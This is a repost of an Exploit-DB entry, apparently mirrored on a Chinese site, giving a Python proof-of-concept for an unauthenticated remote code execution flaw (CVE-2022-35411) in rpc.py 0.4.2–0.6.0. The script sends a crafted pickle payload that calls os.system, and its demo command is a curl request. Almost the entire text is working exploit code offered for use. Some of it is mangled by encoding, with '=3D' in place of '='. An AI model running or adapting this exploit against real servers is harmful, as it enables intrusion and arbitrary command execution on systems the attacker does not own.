rpc.py 0.6.0 – Remote Code Execution (RCE) - 体验盒子

作者： Elias Hohl

日期： 2022-07-29

类别：

remote

平台：

Python

来源：https://www.exploit-db.com/exploits/50983/

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

37

38

39

40

41

42

43

44

45

46

47

48

49

50

51

52

53

# Exploit Title: rpc.py 0.6.0 - Remote Code Execution (RCE)

# Google Dork: N/A

# Date: 2022-07-12

# Exploit Author: Elias Hohl

# Vendor Homepage: https://github.com/abersheeran

# Software Link: https://github.com/abersheeran/rpc.py

# Version: v0.4.2 - v0.6.0

# Tested on: Debian 11, Ubuntu 20.04

# CVE : CVE-2022-35411

import requests

import pickle

# Unauthenticated RCE 0-day for https://github.com/abersheeran/rpc.py

HOST =3D "127.0.0.1:65432"

URL =3D f"http://{HOST}/sayhi"

HEADERS =3D {

"serializer": "pickle"

}

def generate_payload(cmd):

class PickleRce(object):

def __reduce__(self):

import os

return os.system, (cmd,)

payload =3D pickle.dumps(PickleRce())

print(payload)

return payload

def exec_command(cmd):

payload =3D generate_payload(cmd)

requests.post(url=3DURL, data=3Dpayload, headers=3DHEADERS)

def main():

exec_command('curl http://127.0.0.1:4321')

# exec_command('uname -a')

if __name__ =3D=3D "__main__":

main()